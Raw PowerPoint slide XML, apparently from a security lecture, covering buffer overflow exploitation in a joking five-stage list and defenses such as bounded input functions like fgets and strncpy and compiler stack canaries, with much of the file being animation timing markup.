                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="81" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="257"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="87" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="90" presetID="22" presetClass="exit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="207"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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257"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="98" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="101" presetID="22" presetClass="exit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>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254"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="107" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="262"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="109"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87" grpId="0"/>
      <p:bldP spid="187" grpId="1"/>
      <p:bldP spid="188" grpId="0"/>
      <p:bldP spid="188" grpId="1"/>
      <p:bldP spid="198" grpId="0"/>
      <p:bldP spid="198" grpId="1"/>
      <p:bldP spid="200" grpId="0"/>
      <p:bldP spid="200" grpId="1"/>
      <p:bldP spid="257" grpId="0"/>
      <p:bldP spid="257" grpId="1"/>
      <p:bldP spid="2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744200" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Five Stages of Exploiting Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED11538D-AB45-8642-92B9-BE0AF10AF9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huh. That’s weird.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whoa. That’s cool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I wonder if I can control that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, yes I can.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bwhahahaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a: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94771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8">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="strips(downRight)">
                                      <p:cBhvr>
                                        <p:cTn id="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BCEC44-FC52-FF42-830D-001EDFA6FF1E}"/>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4C4A10F6-AEB6-5445-8B38-6F4B34C9B3D0}"/>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6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8478B1-4538-8C43-84C3-DF07D6BF8A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B26C84A-86F8-064E-A6F5-4054C3FB8A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3912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Programmer-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{627503F5-A6B3-F640-90F3-0D4710FC1087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="5875752" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible, use a language that checks string bounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit the number of characters read/copied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>srtcpy,strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>strncmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>("%s")  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>("%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>s")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>also for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Don’t trust code you didn’t compile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>…and not even then</a:t>
            </a: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B7BB6A1A-95FA-9747-930B-2C9B9F4CF157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331404" y="2393401"/>
            <a:ext cx="5022396" cy="21518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9972316D-E87A-0145-888D-BC9682A745D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331404" y="2393401"/>
            <a:ext cx="5022396" cy="21518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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 8, stdin</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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40BF0FC9-3F06-384F-82F2-6FDF9F4C7DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329764" y="2393401"/>
            <a:ext cx="5022396" cy="21518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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s", bar);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F71FA5F2-700C-CF47-B9AC-4C90B9A8C46D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620830" y="5866140"/>
            <a:ext cx="5650906" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Ken Thompson, “Reflections on Trusting Trust” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://dl.acm.org/doi/10.1145/358198.358210</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32816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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="14" presetClass="entr" presetSubtype="5"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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="14" presetClass="entr" presetSubtype="5"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Effect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="9"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ssolv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animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>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Compiler-Level Protection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduce Stack Canaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D12E067D-42CB-E748-9D83-953AD181752D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds code to detect buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pulls randomly-selected value from read-only memory,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>places it between buffer and return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before function return, compares value on stack to value in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If values don’t match, buffer overflow occurred</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436203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0DEB75D-F27F-1C41-9B3F-A0A65D24A5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code with &amp; without Stack Canary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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13232C4A-2CBD-7748-BE29-57BD774EF6E1}"/>
              </a:ext>
            </a:extLst>
